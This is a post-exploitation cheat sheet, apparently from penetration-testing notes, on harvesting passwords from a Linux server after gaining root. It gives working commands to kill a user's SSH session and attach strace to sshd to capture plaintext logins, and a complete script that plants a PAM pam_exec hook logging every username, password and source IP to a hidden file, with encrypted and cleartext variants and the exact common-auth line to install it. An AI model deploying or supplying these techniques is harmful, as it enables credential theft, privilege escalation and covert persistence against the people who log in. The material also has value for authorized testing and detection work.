Sniffing Passwords

Strace

With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.

[root@victimHost ~]# w
 15:05:18 up 26 days,  6:25,  2 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
unixadm  pts/0    someHost         15:04    6.00s  0.03s  0.00s sshd: unixadm [priv]

[root@victimHost ~]# ps aux | grep ssh
root      1366  0.0  0.0 113000  4368 ?        Ss   Jun02   0:00 /usr/sbin/sshd -D
unixadm  28721  0.0  0.0 176412  2644 ?        S    10:04   0:00 sshd: unixadm@pts/0

[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached

---

PAM

With root access on a server we can create a simple bash script to log all authorization requests handled by pam.d. The log data will show a timestamp, username, password and source IP all in cleartext. This is of course very useful when trying to pivot and/or escalate privileges.

Encrypted logs

The below helper script will create a new, pam_log.sh, script to be uploaded on a target host.

#!/bin/bash
KEY_DIR="./ssh_key_pair"
PRIVATE_KEY_PATH="${KEY_DIR}/pam-id_rsa"
PUBLIC_KEY_PATH="${KEY_DIR}/pam-id_rsa.pub"
PEM_KEY_PATH="${KEY_DIR}/pam-id_rsa.pem"
LOG_SCRIPT_PATH="./pam_log.sh"

mkdir -p "$KEY_DIR"
echo "[+] Generating SSH key pair..."
ssh-keygen -t rsa -b 4096 -m PEM -f "$PRIVATE_KEY_PATH" -N "" >/dev/null

echo "[+] Extracting public key in PEM format..."
ssh-keygen -e -f "$PUBLIC_KEY_PATH" -m PEM > "${PEM_KEY_PATH}"

SSH_PUBLIC_KEY=$(cat "${PEM_KEY_PATH}" | sed ':a;N;$!ba;s/\n/\\n/g')

echo "[+] Creating the log script..."
cat <<EOF > "$LOG_SCRIPT_PATH"
#!/bin/bash
SSH_PUBLIC_KEY="$SSH_PUBLIC_KEY"
LOG_ENTRY=" \$(date) \${PAM_USER}, \$(cat -), From: \${PAM_RHOST}"
echo "\$LOG_ENTRY" | openssl pkeyutl -encrypt -inkey <(echo -e "\$SSH_PUBLIC_KEY" | sed 's/\\n/\n/g') -pubin | base64 >> /var/log/creds.log
EOF

chmod +x "$LOG_SCRIPT_PATH"
echo "[+] Generated log script: $LOG_SCRIPT_PATH"
echo -e "\n[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey $PRIVATE_KEY_PATH"

kdev :: ~/log » ./create_pam_log.sh 
[+] Generating SSH key pair...
[+] Extracting public key in PEM format...
[+] Creating the log script...
[+] Generated log script: ./pam_log.sh

[i] Decrypt log: cat /var/log/creds.log | base64 -d | openssl pkeyutl -decypt -inkey ./ssh_key_pair/pam-id_rsa

Upload pam_log.sh to the target and modify /etc/pam.d/common-auth to execute the script on authentication requests.

kdev :: ~ » echo "auth optional pam_exec.so quiet expose_authtok /home/void/log/pam_log.sh" | sudo tee -a /etc/pam.d/common-auth

Wait for a user to login and reap the rewards. Other users are unable to to read the content without having the private key.

kdev :: ~/log » cat /var/log/creds.log
WNGIdThHgz[...]Hww2aa0=
kdev :: ~/log » cat /var/log/creds.log | base64 -d | openssl pkeyutl -decrypt -inkey ./ssh_key_pair/pam-id_rsa
 Fri Mar 14 11:18:14 CET 2025 void, Passw0rd!, From: ::1

Unencrypted logs

If you don't care about the security aspects, or if the target doesn't have openssl or base64 installed, you can instead use this simple unencrypted version to log authentication requests.

## Create the simple script to log logins
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh                    
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log

## Create log file and set high permissions so no unauthorized user reads it
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log

## Edit /etc/pam.d/common-auth and add the following line
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh

## All services using PAM will now be logged to /var/log/creds.log in clear text
➜  ~ cat /var/log/creds.log
 Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: ::1